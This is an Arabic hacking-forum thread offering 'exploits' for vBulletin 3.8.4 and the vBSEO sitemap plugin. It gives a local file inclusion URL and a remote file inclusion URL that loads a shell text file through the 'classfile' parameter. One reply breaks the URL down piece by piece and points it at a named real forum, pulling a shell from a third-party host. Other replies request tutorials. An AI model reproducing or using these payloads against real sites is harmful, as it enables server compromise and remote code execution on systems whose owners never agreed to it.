ثغرة لـ منتديات vb version.3.8.4

[حربي هكر]

السلام عليكم .. ثغرة لعيون منتديات العناكب .. خلال بحثي اليوم

حصلت ثغرة 2010 .. لـ منتديات vb' version 3.8.4

بعطيكم الاستغلال


############# ===[ Exploits ]=== ###########
# 1-
http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI]
# 2-
http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt?
########################


smilies15

[هاكر مغربي]

الشرح غير مفهوم ومبهم

الرجـــاء الشرح بالفيديو أو الصور

شكـــرا لك

[Hαcĸer'ѕ Kιɴɢ]

[align=center]مشكور حبيبي على الثغره
لكن لو ممكن تشرحها على الاقل بالصور
و لك احلى تقييم
[/align]

[ViRuS Qalaa]

[align=center]شكرا لك على الثغرة بارك الله فيك بلنسبة الاخوان هاكر مغربي & hacker's king
الاستغلال مايراد لة شرح طويل فهوا بسيط جدا راح اطبق على الاستغلال الثاني ولاستغلال الاول اخي غلط لانك ماواضع المتغير المصاب بعد علامة الاستفهام يرجى اعادة كتابة الاستغلال
الاستغلال الثاني : هو استغلال لثغرة الفايل انكود lfi

كود PHP:

http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt? 


http//www.site.com<<< الموقع المستهدف
[path]<<< المجلد الموجد فية المنتدى
includes/functions.php<<<مسار الملف المصاب
?<<<اشارة الاستفهام التي تكون قبل المتغير المصاب
classfile<<< المتغير المصاب
[shell].txt?<<<رابط الشل بصيغة txt وبعدة علامة الاستفهام

وراح اطبق لكم على المنتدى العناكب ههههه الاستغلال

كود PHP:

www.vbspiders.com/vb/includes/functions.php?classfile=http://www.e-linux-solutions.com/descargas/data.txt? 


اتمنى ان تكونوا فهمت الاستغلال

تحياتي لكم [/align]

[karim_topten]

مشكور اخوي

اتمنى تكون فعاله

بس أضم صوتي لشباب

===============

تكرم اخونا فيروس القلعه على التوضيح

[Q2-FOX2R]

امممم
للأسف عصر الثغرات ديأقصد لوكال او ريموت فايل أنلكود ولى

بسبب اصدآر االبي آتش بي الجديد